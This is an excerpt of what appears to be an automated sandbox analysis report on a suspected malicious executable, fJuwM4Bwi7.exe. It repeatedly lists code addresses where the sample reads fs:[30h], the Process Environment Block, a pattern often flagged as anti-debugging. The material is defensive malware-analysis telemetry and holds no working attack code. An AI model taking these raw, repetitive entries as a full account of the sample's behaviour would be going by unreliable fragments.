        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291510D mov eax, dword ptr fs:[00000030h]8_2_3291510D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF13E mov eax, dword ptr fs:[00000030h]8_2_329CF13E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947128 mov eax, dword ptr fs:[00000030h]8_2_32947128
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947128 mov eax, dword ptr fs:[00000030h]8_2_32947128
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294415F mov eax, dword ptr fs:[00000030h]8_2_3294415F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E5149 mov eax, dword ptr fs:[00000030h]8_2_329E5149
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916179 mov eax, dword ptr fs:[00000030h]8_2_32916179
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3296717A mov eax, dword ptr fs:[00000030h]8_2_3296717A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3296717A mov eax, dword ptr fs:[00000030h]8_2_3296717A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918690 mov eax, dword ptr fs:[00000030h]8_2_32918690
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299C691 mov eax, dword ptr fs:[00000030h]8_2_3299C691
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF68C mov eax, dword ptr fs:[00000030h]8_2_329CF68C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D86A8 mov eax, dword ptr fs:[00000030h]8_2_329D86A8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D86A8 mov eax, dword ptr fs:[00000030h]8_2_329D86A8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293D6D0 mov eax, dword ptr fs:[00000030h]8_2_3293D6D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DA6C0 mov eax, dword ptr fs:[00000030h]8_2_329DA6C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329106CF mov eax, dword ptr fs:[00000030h]8_2_329106CF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298C6F2 mov eax, dword ptr fs:[00000030h]8_2_3298C6F2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298C6F2 mov eax, dword ptr fs:[00000030h]8_2_3298C6F2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329096E0 mov eax, dword ptr fs:[00000030h]8_2_329096E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329096E0 mov eax, dword ptr fs:[00000030h]8_2_329096E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291C6E0 mov eax, dword ptr fs:[00000030h]8_2_3291C6E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329156E0 mov eax, dword ptr fs:[00000030h]8_2_329156E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329156E0 mov eax, dword ptr fs:[00000030h]8_2_329156E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329156E0 mov eax, dword ptr fs:[00000030h]8_2_329156E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329366E0 mov eax, dword ptr fs:[00000030h]8_2_329366E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329366E0 mov eax, dword ptr fs:[00000030h]8_2_329366E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A3608 mov eax, dword ptr fs:[00000030h]8_2_329A3608
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293D600 mov eax, dword ptr fs:[00000030h]8_2_3293D600
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293D600 mov eax, dword ptr fs:[00000030h]8_2_3293D600
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF607 mov eax, dword ptr fs:[00000030h]8_2_329CF607
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294360F mov eax, dword ptr fs:[00000030h]8_2_3294360F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4600 mov eax, dword ptr fs:[00000030h]8_2_329E4600
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32910630 mov eax, dword ptr fs:[00000030h]8_2_32910630
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940630 mov eax, dword ptr fs:[00000030h]8_2_32940630
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917623 mov eax, dword ptr fs:[00000030h]8_2_32917623
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32915622 mov eax, dword ptr fs:[00000030h]8_2_32915622
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32915622 mov eax, dword ptr fs:[00000030h]8_2_32915622
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BD62C mov ecx, dword ptr fs:[00000030h]8_2_329BD62C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BD62C mov ecx, dword ptr fs:[00000030h]8_2_329BD62C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BD62C mov eax, dword ptr fs:[00000030h]8_2_329BD62C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32945654 mov eax, dword ptr fs:[00000030h]8_2_32945654
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294265C mov eax, dword ptr fs:[00000030h]8_2_3294265C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294265C mov ecx, dword ptr fs:[00000030h]8_2_3294265C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294265C mov eax, dword ptr fs:[00000030h]8_2_3294265C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291965A mov eax, dword ptr fs:[00000030h]8_2_3291965A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291965A mov eax, dword ptr fs:[00000030h]8_2_3291965A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32913640 mov eax, dword ptr fs:[00000030h]8_2_32913640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F640 mov eax, dword ptr fs:[00000030h]8_2_3292F640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F640 mov eax, dword ptr fs:[00000030h]8_2_3292F640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F640 mov eax, dword ptr fs:[00000030h]8_2_3292F640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294C640 mov eax, dword ptr fs:[00000030h]8_2_3294C640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294C640 mov eax, dword ptr fs:[00000030h]8_2_3294C640
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D64A mov eax, dword ptr fs:[00000030h]8_2_3290D64A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D64A mov eax, dword ptr fs:[00000030h]8_2_3290D64A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32910670 mov eax, dword ptr fs:[00000030h]8_2_32910670
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952670 mov eax, dword ptr fs:[00000030h]8_2_32952670
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952670 mov eax, dword ptr fs:[00000030h]8_2_32952670
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32923660 mov eax, dword ptr fs:[00000030h]8_2_32923660
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32923660 mov eax, dword ptr fs:[00000030h]8_2_32923660
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32923660 mov eax, dword ptr fs:[00000030h]8_2_32923660
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32907662 mov eax, dword ptr fs:[00000030h]8_2_32907662
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32907662 mov eax, dword ptr fs:[00000030h]8_2_32907662
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32907662 mov eax, dword ptr fs:[00000030h]8_2_32907662
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294666D mov esi, dword ptr fs:[00000030h]8_2_3294666D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294666D mov eax, dword ptr fs:[00000030h]8_2_3294666D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294666D mov eax, dword ptr fs:[00000030h]8_2_3294666D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32941796 mov eax, dword ptr fs:[00000030h]8_2_32941796
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32941796 mov eax, dword ptr fs:[00000030h]8_2_32941796
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E79D mov eax, dword ptr fs:[00000030h]8_2_3298E79D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB781 mov eax, dword ptr fs:[00000030h]8_2_329EB781
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB781 mov eax, dword ptr fs:[00000030h]8_2_329EB781
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E17BC mov eax, dword ptr fs:[00000030h]8_2_329E17BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329107A7 mov eax, dword ptr fs:[00000030h]8_2_329107A7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DD7A7 mov eax, dword ptr fs:[00000030h]8_2_329DD7A7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DD7A7 mov eax, dword ptr fs:[00000030h]8_2_329DD7A7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DD7A7 mov eax, dword ptr fs:[00000030h]8_2_329DD7A7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF7CF mov eax, dword ptr fs:[00000030h]8_2_329CF7CF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329177F9 mov eax, dword ptr fs:[00000030h]8_2_329177F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329177F9 mov eax, dword ptr fs:[00000030h]8_2_329177F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E7E0 mov eax, dword ptr fs:[00000030h]8_2_3293E7E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329137E4 mov eax, dword ptr fs:[00000030h]8_2_329137E4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291471B mov eax, dword ptr fs:[00000030h]8_2_3291471B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291471B mov eax, dword ptr fs:[00000030h]8_2_3291471B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF717 mov eax, dword ptr fs:[00000030h]8_2_329CF717
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D700 mov ecx, dword ptr fs:[00000030h]8_2_3291D700
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B705 mov eax, dword ptr fs:[00000030h]8_2_3290B705
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B705 mov eax, dword ptr fs:[00000030h]8_2_3290B705
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B705 mov eax, dword ptr fs:[00000030h]8_2_3290B705
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B705 mov eax, dword ptr fs:[00000030h]8_2_3290B705
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D970B mov eax, dword ptr fs:[00000030h]8_2_329D970B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D970B mov eax, dword ptr fs:[00000030h]8_2_329D970B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293270D mov eax, dword ptr fs:[00000030h]8_2_3293270D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293270D mov eax, dword ptr fs:[00000030h]8_2_3293270D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293270D mov eax, dword ptr fs:[00000030h]8_2_3293270D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32939723 mov eax, dword ptr fs:[00000030h]8_2_32939723
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov eax, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov eax, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov eax, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov ecx, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov eax, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32932755 mov eax, dword ptr fs:[00000030h]8_2_32932755
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F75B mov eax, dword ptr fs:[00000030h]8_2_3290F75B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BE750 mov eax, dword ptr fs:[00000030h]8_2_329BE750
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32943740 mov eax, dword ptr fs:[00000030h]8_2_32943740
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294174A mov eax, dword ptr fs:[00000030h]8_2_3294174A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940774 mov eax, dword ptr fs:[00000030h]8_2_32940774
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914779 mov eax, dword ptr fs:[00000030h]8_2_32914779
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914779 mov eax, dword ptr fs:[00000030h]8_2_32914779
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32922760 mov ecx, dword ptr fs:[00000030h]8_2_32922760
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 mov eax, dword ptr fs:[00000030h]8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294B490 mov eax, dword ptr fs:[00000030h]8_2_3294B490
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294B490 mov eax, dword ptr fs:[00000030h]8_2_3294B490
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299C490 mov eax, dword ptr fs:[00000030h]8_2_3299C490
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32910485 mov ecx, dword ptr fs:[00000030h]8_2_32910485
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E4BC mov eax, dword ptr fs:[00000030h]8_2_3294E4BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329124A2 mov eax, dword ptr fs:[00000030h]8_2_329124A2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329124A2 mov ecx, dword ptr fs:[00000030h]8_2_329124A2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299D4A0 mov ecx, dword ptr fs:[00000030h]8_2_3299D4A0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299D4A0 mov eax, dword ptr fs:[00000030h]8_2_3299D4A0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299D4A0 mov eax, dword ptr fs:[00000030h]8_2_3299D4A0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329444A8 mov eax, dword ptr fs:[00000030h]8_2_329444A8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329344D1 mov eax, dword ptr fs:[00000030h]8_2_329344D1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329344D1 mov eax, dword ptr fs:[00000030h]8_2_329344D1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F4D0 mov eax, dword ptr fs:[00000030h]8_2_3293F4D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329314C9 mov eax, dword ptr fs:[00000030h]8_2_329314C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329314C9 mov eax, dword ptr fs:[00000030h]8_2_329314C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329314C9 mov eax, dword ptr fs:[00000030h]8_2_329314C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329314C9 mov eax, dword ptr fs:[00000030h]8_2_329314C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329314C9 mov eax, dword ptr fs:[00000030h]8_2_329314C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF4FD mov eax, dword ptr fs:[00000030h]8_2_329CF4FD
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329164F0 mov eax, dword ptr fs:[00000030h]8_2_329164F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329394FA mov eax, dword ptr fs:[00000030h]8_2_329394FA
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329454E0 mov eax, dword ptr fs:[00000030h]8_2_329454E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E4EF mov eax, dword ptr fs:[00000030h]8_2_3294E4EF
